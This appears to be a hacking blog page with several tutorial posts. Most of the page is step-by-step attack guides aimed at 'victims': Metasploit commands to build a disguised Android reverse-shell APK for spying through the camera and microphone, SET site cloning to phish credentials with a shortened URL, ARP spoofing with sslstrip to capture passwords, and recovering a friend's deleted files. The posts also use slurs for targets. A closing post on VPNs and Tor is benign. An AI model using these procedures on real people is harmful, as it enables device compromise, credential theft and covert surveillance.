Hacking an android phone with Metasploit

Android devices have become a potential target from the day they were introduced in the market. The are proved to be good targets as they give out a lot of information about the target. There are various ways to hack android phone like through an app, browser, etc.
What you need?
All you need is Kali Linux installed on Vmware.

How to?
  1. Open the terminal and type the command ifconfig and note down the eth0 ip.
  2. Now type the command cd Desktop so that you can get your apk file on the desktop of the virtual machine.
  3. Now type the command msfpayload android/meterpreter/reverse_tcp LHOST= ip LPORT=port R > hcak.apk. Here you have to paste the ip after LHOST and you can change hcak to any name you would prefer for the app.
  4. Now type msfconsole & hit enter and then type use exploit/multi/handler & hit enter.
  5. Now type set payload android/meterpreter/reverse_tcp and hit enter to set the payload for the handler.
  6. Now to set the listener ip and port type set lhost ip and set lport port (make sure that the ip and port should be the same as that of the msfpayload command). To check if the ip and host are properly set type show options and hit enter.
  7. Now type exploit and hit enter and wait for the victim to install the apk and open it.
  8. Now type ifconfig or sysinfo to find out details about your target.You can try different commands to take snapshots, webcam snaps, voice recording,etc.
Note:- 
You will only have the access to the phone till the session ends if the session ends then you have to wait till the victim runs the app again. 

Posted by 9 comments :

SET: Phishing like a Pro

Phishing is a technique used by hackers to get the username and password by asking the victim to enter their credentials into a webpage which looks similar to the original site. This technique need your social engineering skills with a fair set of programming skills. And you also need to know a lit  Kali Linux provides a tool kit Know as SET(Social Engineering Tool kit) which makes the complex process a lot easier and a lot more systematic.


But but but this trick is only successful on a retard user.

What you need?

 All you need is Kali Linux installed on Vmware.

How to
  1. Start the terminal and type ifconfig and note the eth0 ip which is your Ethernet ip. 
  2. Now type the command service metasploit start to start the metasploit service.
  3. Now type the command setoolkit and hit enter to start the SET tool kit. And then select type 1 and hit enter.
  4. Now select the option 2 from the list and hit enter .
  5. Now select the option 3 form the list and hit enter.
  6. Now select the option 2 which is site cloner from the list and hit enter.
  7. Now enter the eth0 ip which you noted in the beginning by using ifconfig.And then hit enter and the enter the site URL(http://www.anysite.com) and hit enter.
  8.  Now type the ip on any web browser to see the phishing site. Paste the ip in Google URL shortener to convert the ip into a good looking URL. Send this to the victim via various methods and wait. After the retard user enters the username and password. Check the file which has the name like harvester_date.txt in the folder /var/www/ . 

Note:- 
This trick will only work if the user is stupid enough to enter his/her credentials on the fake page. And another problem is that if you see the URL you can find out the difference between the original and  the fake one.  In other words it depends on User Retard Level. 

Posted by No comments :

SSL Strip

What is SSL Strip? 
SSL strip is a type of man in the middle attack in which the request is converted to HTTP from an HTTPS request and then sent to the website through the router and then the browser connects to website through the HTTP connection.
 HTTPS is more secured that HTTP(According to security professionals) but according to hackers "EVERYTHING is Shit".


What you need?
  1. Kali Linux installed on Vmware 
  2. Android phone with Fing - Network Tools (optional)
How to?
  1. Start your virtual machine.
  2. Open the terminal and then type ifconfig. It will give you the list of interfaces. Note the wireless LAN interface(wlan*).
  3. Now type the commands echo 1 > /proc/sys/net/ipv4/ip_forward and then type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-prot 8080 to forward the traffic.
  4. Then you can type the commands route -n (for gateway ip) and nmap -sS -O gateway ip (for target ip) or you can simply open the Fing - Network Tools to find out the router and target ip.
  5. Now to start the ARP spoofing by typing the command arpsoof -i wlan0 -t 192.168.1.
    123 -r 192.168.1.1     .     Here wlan0 can be replaced by your wireless LAN interface like wlan0, wlan1, wlan2, etc and the ip after -t is you target ip and the ip after -r is the router ip.
  6. Keep the arpspoof terminal running and then open a new terminal window and then type sslstrip -l 8080. 
  7. Now wait after the target logs into any site you will get a little details on the sslstrip window. Open a new terminal window and type cat sslstrip.log this command will open the log file and try to locate an mail id and password.
Note:-
This will not work on Facebook as the traffic is encrypted thus you won't get the username and password.
  
Posted by No comments :

Recover & Retrive:Find out what your friend's secrets

Whenever we get a pendrive even if the drive is empty it still has a lot of information about what was stored on it. This can help you find out what he/she had saved on that drive or recover sensitivity information about your company which an employee had leaked. Recovery can be done for various reasons but the tricks remain the same.


What you need?
All you need is Kali Linux on Vmware.

How to? 

Level-1:- Recuva
Recuva is one of the basic file recovery software which can be used to recovery files deleted on a regular windows computer. This software is also portable, to make a portable version you only need to copy the files from the program files directory to your pendrive. It can recovery the files of a specific file format like images, videos, music, etc. It is useful to quickly recover the file which you might have accidentally deleted.
  

 We need to run a basic command which is fdisk -l which gives you the names of all devices which is used for tools to recover files of a USB stick mounted to your Linux system.





You can consider this as the first step towards file recovery in Kali Linux.






Level-2:- foremost
 foremost is a quick recovery tool available in Kali Linux. This tool can be used in audits where you need to recover the files deleted quickly. You can use various parameters according to the requirements of the audit. To find out about all the parameters you can run the command foremost -h. But if you want to recover all files and save them on a file then you can use the command foremost -t all -v -i device name -o directory.   Here -t is the parameter which decides the type of file, -i is the parameter which decides the device name or image name, -o is the parameter which decides the output directory.

 Level-3:- scalpel
scalpel is like a bazooka  in the field of recovery. This is the ultimate recovery tool which can recover all the files deleted from a derive or image of that drive. To use this tool you will need to first do some changes in the .confg file which is present in etc/scalpel. You have to delete the # present in front of the file type. The best thing you can do is delete all the # persent in front of all the file formats. After this save it and then open a terminal and then type scalpel -h to find out about the different parameters you can use. To recover the files to a specific directory type the command scalpel device name or image file path -o output directory.


Note:- When you use tools like scalpel and foremost you get and audit.txt file with the actual files. This audit.txt file is consist the log of all files which were recovered by the tools. 

Another great feature of these tools is that it save all the different file extensions under different folders which is systematic and is helpful to sort the files and locate the file which is needed.
Posted by No comments :

Ghost on the web: Science of private browsing

Whenever you go on the net there are various organizations that track your activity on the net which is then used for various purpose. This data is used for advertising and censorship. Some countries block certain content for its citizens. Now some of these organization also try to trace you back to your house. Now if you are trying to view the content blocked in your country and the government traces your IP then the next second you will find government at your doorstep.
 There are various methods to anonymously access the net.

Private windows:- 
Now a days all the browsers have a feature for private window(incognito in chrome) this can be consider as the first line of defense from cyber espionage but it is not that efficient as the IP remains the same. Such the methods can be easily bypassed. This kind of browsing can only protect you from the individuals who are have physical access to your computer. In other  words mom wont know about the site which you accessed.

Proxy sites:- 
A proxy site is a special site which allows you to access the content blocked. These sites act as proxy server which relay all your traffic through the server to give you access of the blocked content. The problem with these sites is that they are hell slow and the problem that your IP is always out and hence the chance of getting traced is always there. In other words you can see YouTube videos on your college network. There are millions of such sites like Kproxy, boomproxy, etc.
 


 VPN:-
VPN is the acronym of virtual private network. A virtual private network is a virtual network in which a computer is connected like a regular network and in this process the public IP of the computer changes. To understand this we tried various android apps like psiphon, tunnelbear, etc. To check the public IP we used Landroid. The difference observed was that the public IP and IPS of my phone change. In other words you can teleport to any country.
 
This is understood that I didn't travel to Russia to connect to their network and take this screenshot. For security purpose I had to hide my IP.
This IP did change to US, Italian and many other countries IPs'.


We tried 2 services which was available for both windows as well as android which were psiphon and tunnelbear. Tunnelbear was a free to try VPN and psiphon was a completely free VPN. The main advantage of tunnelbear was that we could select the sever manually thus which offered you a little control. But psiphpn was more practical as per far as use was concerned. There are hundreds of other VPNs which are available on the net. 

The main drawbacks are that if the government wants to trace you it is easy as these servers have your IP. But all the VPNs require a stable internet connection if the connection keeps on dropping then these software can slow down the device and sometimes drain your battery.



TOR:-
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It relays the traffic across various nodes. This channel is only open for 10 minutes and then it changes the nodes. This software was initially developed for the US armed forces so that they can connect to their home bases without any leaks, thus it is simple to install and use. Tor is available for android, windows, Linux and various other operating systems. 

You can host sites(onion sites) and access site of the dark web(hidden web) through this.This software does take a little more time for connecting but is highly secured. But it has a drawback that the initial and final connection isn't encrypted and it requires a special browser to work which is mostly a modified Firefox. There are ways to crack this as well but the skill set required is high enough. In other words you can be a ghost on the web.  
 








Conclusion:- 
Thus by using various techniques depending on the level of security you need on the web you can be a ghost on the web and browse the net privately.
Posted by No comments :
Subscribe to: Posts ( Atom )